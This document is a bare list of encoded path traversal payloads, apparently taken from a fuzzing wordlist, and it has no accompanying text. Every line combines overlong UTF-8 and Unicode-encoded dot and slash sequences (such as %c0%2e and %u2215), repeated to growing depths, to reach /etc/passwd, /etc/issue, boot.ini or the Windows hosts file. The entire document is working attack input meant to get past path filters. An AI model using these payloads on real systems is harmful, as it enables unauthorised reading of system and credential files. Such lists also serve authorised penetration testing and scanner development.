-%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcboot.ini -%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pc%c0%2e%c0%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%2e%c0%2e%c0%9vetc%c0%9vpasswd -%c0%2e%c0%2e%c0%9vetc%c0%9vissue -%c0%2e%c0%2e%c0%9vboot.ini -%c0%2e%c0%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vpasswd -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vissue -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vboot.ini -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vpasswd -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vissue -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vboot.ini -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vpasswd -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vissue -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vboot.ini -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vpasswd -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vissue -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vboot.ini -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vpasswd -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vetc%c0%9vissue -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vboot.ini -%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9v%c0%2e%c0%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%2e%c0%2e%c0%qfetc%c0%qfpasswd -%c0%2e%c0%2e%c0%qfetc%c0%qfissue -%c0%2e%c0%2e%c0%qfboot.ini -%c0%2e%c0%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfpasswd -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfissue -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfboot.ini -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfpasswd -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfissue -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfboot.ini -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfpasswd -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfissue -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfboot.ini -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfpasswd -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfissue -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfboot.ini -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfpasswd -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfetc%c0%qfissue -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfboot.ini -%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qf%c0%2e%c0%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%2e%c0%2e%c1%8setc%c1%8spasswd -%c0%2e%c0%2e%c1%8setc%c1%8sissue -%c0%2e%c0%2e%c1%8sboot.ini -%c0%2e%c0%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8spasswd -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8sissue -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8sboot.ini -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8spasswd -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8sissue -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8sboot.ini -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8spasswd -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8sissue -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8sboot.ini -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8spasswd -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8sissue -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8sboot.ini -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8spasswd -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8setc%c1%8sissue -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8sboot.ini -%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8s%c0%2e%c0%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%2e%c0%2e%c1%1cetc%c1%1cpasswd -%c0%2e%c0%2e%c1%1cetc%c1%1cissue -%c0%2e%c0%2e%c1%1cboot.ini -%c0%2e%c0%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cpasswd -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cissue -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cboot.ini -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cpasswd -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cissue -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cboot.ini -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cpasswd -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cissue -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cboot.ini -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cpasswd -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cissue -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cboot.ini -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cpasswd -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cetc%c1%1cissue -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cboot.ini -%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1c%c0%2e%c0%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%2e%c0%2e%c1%afetc%c1%afpasswd -%c0%2e%c0%2e%c1%afetc%c1%afissue -%c0%2e%c0%2e%c1%afboot.ini -%c0%2e%c0%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afpasswd -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afissue -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afboot.ini -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afpasswd -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afissue -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afboot.ini -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afpasswd -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afissue -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afboot.ini -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afpasswd -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afissue -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afboot.ini -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afpasswd -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afetc%c1%afissue -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afboot.ini -%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%af%c0%2e%c0%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%2e%c0%2e%bg%qfetc%bg%qfpasswd -%c0%2e%c0%2e%bg%qfetc%bg%qfissue -%c0%2e%c0%2e%bg%qfboot.ini -%c0%2e%c0%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfpasswd -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfissue -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfboot.ini -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfpasswd -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfissue -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfboot.ini -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfpasswd -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfissue -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfboot.ini -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfpasswd -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfissue -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfboot.ini -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfpasswd -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfetc%bg%qfissue -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfboot.ini -%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qf%c0%2e%c0%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%2e%c0%2e%u2215etc%u2215passwd -%c0%2e%c0%2e%u2215etc%u2215issue -%c0%2e%c0%2e%u2215boot.ini -%c0%2e%c0%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215passwd -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215issue -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215boot.ini -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215passwd -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215issue -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215boot.ini -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215passwd -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215issue -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215boot.ini -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215passwd -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215issue -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215boot.ini -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215passwd -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215etc%u2215issue -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215boot.ini -%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215%c0%2e%c0%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%2e%c0%2e%u2216etc%u2216passwd -%c0%2e%c0%2e%u2216etc%u2216issue -%c0%2e%c0%2e%u2216boot.ini -%c0%2e%c0%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216passwd -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216issue -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216boot.ini -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216passwd -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216issue -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216boot.ini -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216passwd -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216issue -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216boot.ini -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216passwd -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216issue -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216boot.ini -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216passwd -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216etc%u2216issue -%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216boot.ini 